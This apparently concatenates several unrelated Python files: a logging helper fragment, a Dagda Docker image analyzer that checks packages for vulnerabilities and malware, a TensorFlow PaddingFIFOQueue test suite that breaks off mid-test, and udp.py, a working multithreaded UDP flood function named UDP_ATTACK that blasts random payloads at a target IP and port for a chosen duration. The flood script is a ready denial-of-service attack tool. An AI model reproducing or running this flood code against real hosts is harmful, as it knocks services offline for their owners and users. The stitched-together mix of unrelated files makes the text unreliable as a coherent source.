self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message, notify=False):
"""Info level."""
self.log(message, "info")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def warning(self, message, notify=True):
"""Warning level."""
self.log(message, "warning")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def error(self, message, notify=True):
"""Error level."""
self.log(message, "error")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
def debug(self, message, notify=False):
"""Debug level."""
self.log(message, "debug")
if self.notify_enabled and notify:
self.notificationhandler.queue_notification(message)
|
udp.py | #!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
import socket
from threading import Thread
def UDP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting UDP attack...")
threads_list = []
# UDP flood
def udp_flood():
global FINISH
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
if FINISH:
break
# Send random payload
try:
for _ in range(16):
payload = random._urandom(random.randint(1, 60))
sock.sendto(payload, (target_ip, target_port))
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" UDP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread)+ "...")
t = Thread(target = udp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
analyzer.py | #
# Licensed to Dagda under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Dagda licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import requests
import json
import traceback
from threading import Thread
from analysis.static.os import os_info_extractor
from analysis.static.dependencies import dep_info_extractor
from analysis.static.av import malware_extractor
from api.internal.internal_server import InternalServer
from log.dagda_logger import DagdaLogger
from analysis.static.util.utils import extract_filesystem_bundle
from analysis.static.util.utils import clean_up
# Analyzer class
class Analyzer:
# -- Public methods
# Analyzer Constructor
def __init__(self, dagda_server_url=None):
super(Analyzer, self).__init__()
self.is_remote = False
if dagda_server_url is not None:
self.dagda_server_url = dagda_server_url
self.is_remote = True
else:
self.mongoDbDriver = InternalServer.get_mongodb_driver()
self.dockerDriver = InternalServer.get_docker_driver()
# Evaluate image from image name or container id
def evaluate_image(self, image_name, container_id):
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('ENTRY to the method for analyzing a docker image')
# Init
data = {}
# -- Static analysis
image_name = self.dockerDriver.get_docker_image_name_by_container_id(container_id) if container_id \
else image_name
os_packages = []
malware_binaries = []
dependencies = []
temp_dir = None
try:
# Get OS packages
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving OS packages from the docker image ...')
if container_id is None: # Scans the docker image
os_packages = os_info_extractor.get_soft_from_docker_image(docker_driver=self.dockerDriver,
image_name=image_name)
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
image_name=image_name)
else: # Scans the docker container
os_packages = os_info_extractor.get_soft_from_docker_container_id(docker_driver=self.dockerDriver,
container_id=container_id)
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
container_id=container_id)
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('OS packages from the docker image retrieved')
# Get malware binaries in a parallel way
malware_thread = Thread(target=Analyzer._threaded_malware, args=(self.dockerDriver, temp_dir,
malware_binaries))
malware_thread.start()
# Get programming language dependencies in a parallel way
# dependencies_thread = Thread(target=Analyzer._threaded_dependencies, args=(self.dockerDriver, image_name,temp_dir, dependencies))
#dependencies_thread.start()
# Waiting for the threads
malware_thread.join()
#dependencies_thread.join()
except Exception as ex:
message = "Unexpected exception of type {0} occurred: {1!r}"\
.format(type(ex).__name__, ex.get_message() if type(ex).__name__ == 'DagdaError' else ex.args)
DagdaLogger.get_logger().error(message)
if InternalServer.is_debug_logging_enabled():
traceback.print_exc()
data['status'] = message
# -- Cleanup
if temp_dir is not None:
clean_up(temporary_dir=temp_dir)
# -- Prepare output
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Preparing analysis output ...')
if 'status' not in data or data['status'] is None:
data['status'] = 'Completed'
data['image_name'] = image_name
data['timestamp'] = datetime.datetime.now().timestamp()
data['static_analysis'] = self.generate_static_analysis(image_name, os_packages, dependencies, malware_binaries)
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Analysis output completed')
# -- Return
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('EXIT from the method for analyzing a docker image')
return data
# Generates the result of the static analysis
def generate_static_analysis(self, image_name, os_packages, dependencies, malware_binaries):
data = {}
data['os_packages'] = self.generate_os_report(image_name, os_packages)
data['prog_lang_dependencies'] = self.generate_dependencies_report(image_name, dependencies)
data['malware_binaries'] = malware_binaries
return data
# Generates dependencies report
def generate_dependencies_report(self, image_name, dependencies):
data = {}
dep_details = {}
dep_details['java'] = []
dep_details['python'] = []
dep_details['nodejs'] = []
dep_details['js'] = []
dep_details['ruby'] = []
dep_details['php'] = []
fp_count = 0
for dependency in dependencies:
d = {}
splitted_dep = dependency.split("#")
d['product'] = splitted_dep[1]
d['version'] = splitted_dep[2]
d['product_file_path'] = splitted_dep[3]
d['vulnerabilities'] = self.get_vulnerabilities(d['product'], d['version'])
d['is_vulnerable'] = True
d['is_false_positive'] = self.is_fp(image_name, d['product'], d['version'])
if d['is_false_positive']:
fp_count += 1
dep_details[splitted_dep[0]].append(d)
# Prepare output
data['vuln_dependencies'] = len(dep_details['java']) + len(dep_details['python']) + \
len(dep_details['nodejs']) + len(dep_details['js']) + \
len(dep_details['ruby']) + len(dep_details['php']) - fp_count
data['dependencies_details'] = dep_details
# Return
return data
# Generates os report
def generate_os_report(self, image_name, os_packages):
data = {}
products_status = []
vuln_products = 0
fp_count = 0
for package in os_packages:
p = {}
p['product'] = package['product']
p['version'] = package['version']
p['vulnerabilities'] = self.get_vulnerabilities(package['product'], package['version'])
if len(p['vulnerabilities']) > 0:
p['is_vulnerable'] = True
vuln_products += 1
else:
p['is_vulnerable'] = False
p['is_false_positive'] = self.is_fp(image_name, package['product'], package['version'])
if p['is_false_positive']:
fp_count += 1
products_status.append(p)
# Prepare output
vuln_products -= fp_count
data['total_os_packages'] = len(products_status)
data['vuln_os_packages'] = vuln_products
data['ok_os_packages'] = data['total_os_packages'] - vuln_products
data['os_packages_details'] = products_status
# Return
return data
# Gets vulnerabilities by product and version
def get_vulnerabilities(self, product, version):
if not self.is_remote:
return self.mongoDbDriver.get_vulnerabilities(product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/vuln/products/' + product)
if r.status_code == 200:
return json.loads(r.content.decode('utf-8'))
return []
# Check if it is a false positive
def is_fp(self, image_name, product, version):
if not self.is_remote:
return self.mongoDbDriver.is_fp(image_name, product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/history/' + image_name + '/fp/' + product)
return r.status_code == 204
# Get malware binaries thread
@staticmethod
def _threaded_malware(dockerDriver, temp_dir, malware_binaries):
# Get malware binaries
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving malware files from the docker image ...')
malware_binaries.extend(malware_extractor.get_malware_included_in_docker_image(docker_driver=dockerDriver,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Malware files from the docker image retrieved')
# Get programming language dependencies thread
@staticmethod
def _threaded_dependencies(dockerDriver, image_name, temp_dir, dependencies):
# Get programming language dependencies
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving dependencies from the docker image ...')
dependencies.extend(dep_info_extractor.get_dependencies_from_docker_image(docker_driver=dockerDriver,
image_name=image_name,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Dependencies from the docker image retrieved')
|
padding_fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
@test_util.run_v1_only("PaddingFIFOQueue removed from v2")
class PaddingFIFOQueueTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32), ((), ()),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(3, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32),
((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = self.evaluate(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, (
(None, None),))
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], self.evaluate(size_t))
enqueue_op.run()
self.assertEqual([0], self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpToWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.cached_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32,
None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.float32, dtypes_lib.int32),
((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tensor_shape.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueUpToPartiallyKnownShapesAndVariableInputNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.string, dtypes_lib.int32),
shapes=((None,), (1, None)))
str_elems = [["a"], ["ab"], ["abc"], ["abc", "d"], ["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [[[1]], [[2]], [[3]], [[1, 2]], [[1, 2, 3]], [[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_up_to(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual([[b"a", b"", b""], [b"ab", b"", b""],
[b"abc", b"", b""], [b"abc", b"d", b""],
[b"abc", b"d", b"e"]], string_val)
self.assertAllEqual([[[1, 0, 0]], [[2, 0, 0]], [[3, 0, 0]], [[1, 2, 0]],
[[1, 2, 3]]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
1].get_shape()))
string_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tensor_shape.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tensor_shape.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, (
(4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32),
((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = data_flow_ops.PaddingFIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
dtypes_lib.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(
([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many(
(array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
with self.assertRaises(ValueError):
